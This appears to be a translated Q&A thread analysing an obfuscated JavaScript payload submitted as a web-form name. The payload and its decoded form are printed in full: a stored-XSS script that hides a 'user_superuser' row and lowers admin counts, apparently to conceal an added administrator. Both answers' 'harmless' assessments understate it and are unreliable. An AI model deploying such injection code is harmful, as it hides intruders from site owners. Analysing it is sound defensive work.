随机用户将此文本添加为Web表单中的名称。我想他的想法是将Javascript注入动态页面。该代码应如何解释? (它是做什么的?)
<script LANGUAGE="JavaScript">
/**
 * De-obfuscation stub: turns a '!'-separated list of decimal character codes
 * into a string and writes that string into the current document.
 *
 * Takes no arguments and returns nothing; its only effect is the
 * document.write() call at the end. Because the decoded text is written as
 * markup, any <script> element it contains is parsed and run by the browser.
 * The first codes (46 46 46 32 60 98) decode to "... <b", i.e. the payload is
 * HTML, not plain text.
 */
function Decode() {
// temp collects the digits of the current code, c is the read position in
// str, out is the decoded result. i is declared but never used in this block.
var temp = "",
i, c = 0,
out = "";
// Encoded payload: decimal character codes, each terminated by '!'.
// NOTE(review): in this listing the literal is wrapped over three physical
// lines. A JavaScript string literal cannot contain a raw line break, so this
// is presumably a capture artifact and the submitted value was one line -
// confirm against the raw form submission.
var str = "46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!62!32!118!97!114!32!115!101!116!85!115!101!114!78!97!109!101!32!61!32!102!117!110!99!116!105!111!110!40!41!123!32!116!114!121!123!32!118!97!114!32!116!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!121!73!100!40!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!41!59!32!119!104!105!108!101!40!116!46!110!111!100!101!78!97!109!101!33!61!34!84!82!34!41!123!32!116!61!116!46!112!97!114!101!110!116!78!111!100!101!59!32!125!59!32!116!46!112!97!114!101!110!116!78!111!100!101!46!114!101!109!111!118!101!67!104!105!108!100!40!116!41!59!32!118!97!114!32!116!97!103!115!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!72!51!34!41!59!32!118!97!114!32!115!32!61!32!34!32!115!104!111!119!110!32!98!101!108!111!119!34!59!32!102!111!114!32!40!118!97!114!32!105!32!61!32!48!59!32!105!32!60!32!116!97!103!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!32!118!97!114!32!116!61!116!97!103!115!91!105!93!46!105!110!110!101!114!72!84!77!76!59!32!118!97!114!32!104!61!116!97!103!115!91!105!93!59!32!105!102!40!116!46!105!110!100!101!120!79!102!40!115!41!62!48!41!123!32!115!32!61!40!112!97!114!115!101!73!110!116!40!116!41!45!49!41!43!115!59!32!104!46!114!101!109!111!118!101!67!104!105!108!100!40!104!46!102!105!114!115!116!67!104!105!108!100!41!59!32!116!32!61!32!100!111!99!117!109!101!110!116!46!99!114!101!97!116!101!84!101!120!116!78!111!100!101!40!115!41!59!32!104!46!97!112!112!101!110!100!67!104!105!108!100!40!116!41!59!32!125!32!125!32!118!97!114!32!97!114!114!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!117!108!34!41!59!32!102!111!114!40!118!97!114!32!105!32!105!110!32!97!114!114!41!32!105!102!
40!97!114!114!91!105!93!46!99!108!97!115!115!78!97!109!101!61!61!34!115!117!98!115!117!98!115!117!98!34!41!123!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!
33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!125!32!125!99!97!116!99!104!40!101!41!123!125!59!32!125!59!32!97!100!100!76!111!97!100!69!118!101!110!116!40!115!101!116!85!115!101!114!78!97!109!101!41!59!32!60!47!115!99!114!105!112!116!62!";
// Assigns to an undeclared name (an implicit global); l is not read anywhere
// in this block.
l = str.length;
// Outer loop: one iteration per encoded character until the end of str.
while (c <= str.length - 1) {
// Gather digits up to the next '!' separator.
while (str.charAt(c) != '!') temp = temp + str.charAt(c++);
// Step over the '!' itself.
c++;
// String.fromCharCode coerces the digit string to a number.
out = out + String.fromCharCode(temp);
temp = "";
}
// Sink: the decoded string is emitted as HTML, so the embedded script runs in
// the context of whichever page rendered the submitted "name" unescaped.
document.write(out);
}
</script>
<script LANGUAGE="JavaScript">
// Runs the decoder from an inline script, so the decoded markup is written
// into the document at this position.
Decode();
</SCRIPT>
答案 0 :(得分:2)
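它使用一些JavaScript代码创建一个脚本标签。它更改了一些HTML元素,似乎不是很危险。具体来说,解码后的脚本会删除包含 id 为 user_superuser 的元素的那一行表格(TR),并把标题中 "shown below" 前的数字以及 "Administrator"、"All" 后面的计数各减一,也就是把列表中的某一行隐藏起来,同时让计数看起来仍然一致。只有当页面在输出该名称字段时没有做HTML转义,这段代码才会执行。我们可能需要知道应该在哪个环境/网站中使用。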
这是脚本创建的代码:
<b id="user_superuser"><script language="JavaScript">
// Decoded payload. setUserName edits the rendered page only: it removes the
// table row that contains the injected <b id="user_superuser"> marker and
// lowers three on-page counters by one, so the listing and its totals still
// look consistent after the row is gone. Nothing here sends data anywhere or
// changes server-side state; the effect is concealment in the browser of
// whoever views the page.
// NOTE(review): the "subsubsub" class and addLoadEvent() look like WordPress
// admin list screens - confirm against the affected site. If so, check the
// user list in the database rather than in the admin UI.
var setUserName = function () {
try {
// The marker element is the <b> that the payload itself wrote.
var t = document.getElementById("user_superuser");
// Climb to the enclosing table row. With no TR ancestor t becomes null and
// t.nodeName throws, which the empty catch below swallows.
while (t.nodeName != "TR") {
t = t.parentNode;
};
// Drop the whole row from the table.
t.parentNode.removeChild(t);
// Headings of the form "<N> shown below": replace the text with N - 1.
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t = tags[i].innerHTML;
var h = tags[i];
// indexOf(s) > 0 means the phrase is present and not at position 0.
if (t.indexOf(s) > 0) {
// parseInt reads the leading number of the heading; s is overwritten, so any
// later H3 is compared against the rewritten text.
s = (parseInt(t) - 1) + s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
// Filter links: every <ul class="subsubsub"> gets its counts adjusted.
// for...in also visits non-index keys of the collection; those have no
// matching className and are skipped by the test below.
var arr = document.getElementsByTagName("ul");
for (var i in arr)
if (arr[i].className == "subsubsub") {
// Variant 1: plain "Administrator (N)".
var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if (n != null && n[1] > 0) {
var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
arr[i].innerHTML = txt;
}
// Variant 2: the same label with the number inside <span class="count">.
var n = />Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
if (n != null && n[1] > 0) {
var txt = arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi, ">Administrator <span class=\"count\">(" + (n[1] - 1) + ")<");
arr[i].innerHTML = txt;
}
// The "All" total is lowered as well.
var n = />All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
if (n != null && n[1] > 0) {
var txt = arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi, ">All <span class=\"count\">(" + (n[1] - 1) + ")<");
arr[i].innerHTML = txt;
}
}
// Every error is discarded, so a page that does not match fails silently.
} catch (e) {};
};
// addLoadEvent is not defined in this listing; it has to come from the host
// page. Presumably it defers setUserName until the page has loaded - verify.
addLoadEvent(setUserName);
答案 1 :(得分:1)
它将其注入页面...
至于它的作用……嗯,其实没做什么。它把页面上一些带有 "Administrator" 文字的标签内容替换掉了……在看不到其余代码的情况下,我无法确切判断,但看起来它主要是想破坏网站的显示,吓唬你。
... <b id="user_superuser">
<script language="JavaScript">
// Decoded payload, as produced by the Decode() stub in the question.
// It works purely on the DOM of the page that rendered it: the table row
// holding the <b id="user_superuser"> marker is removed, then the "N shown
// below" heading and the Administrator / All counters are each decremented so
// the numbers agree with the shortened table. No request is made and no
// stored data is modified by this code.
// NOTE(review): "subsubsub" and addLoadEvent() suggest a WordPress admin
// screen - confirm. The fact that this ran at all means the name field is
// output without HTML escaping on that page.
var setUserName = function() {
try {
// Start from the marker element written by the payload itself.
var t = document.getElementById("user_superuser");
// Walk up until a TR is reached; if there is none, t ends up null and the
// resulting exception is swallowed by the catch at the end.
while (t.nodeName != "TR") {
t = t.parentNode;
};
// Remove that row from the rendered table.
t.parentNode.removeChild(t);
// Rewrite "<N> shown below" headings to show N - 1.
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t = tags[i].innerHTML;
var h = tags[i];
// Matches only when the phrase occurs after position 0.
if (t.indexOf(s) > 0) {
// s now holds the replacement text and is reused as the search string for
// any remaining headings.
s = (parseInt(t) - 1) + s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
// Adjust the counts in each <ul class="subsubsub">.
var arr = document.getElementsByTagName("ul");
for (var i in arr)
if (arr[i].className == "subsubsub") {
// "Administrator (N)" without a wrapping span.
var n = />Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if (n != null && n[1] > 0) {
var txt = arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi, ">Administrator (" + (n[1] - 1) + ")<");
arr[i].innerHTML = txt;
}
// "Administrator <span class="count">(N)".
var n = />Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
if (n != null && n[1] > 0) {
var txt = arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi, ">Administrator <span class=\"count\">(" + (n[1] - 1) + ")<");
arr[i].innerHTML = txt;
}
// "All <span class="count">(N)".
var n = />All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
if (n != null && n[1] > 0) {
var txt = arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi, ">All <span class=\"count\">(" + (n[1] - 1) + ")<");
arr[i].innerHTML = txt;
}
}
// Empty handler: all failures are silent.
} catch (e) {};
};
// addLoadEvent comes from the host page, not from this listing; presumably it
// schedules setUserName for when the page has finished loading - verify.
addLoadEvent(setUserName);
</script>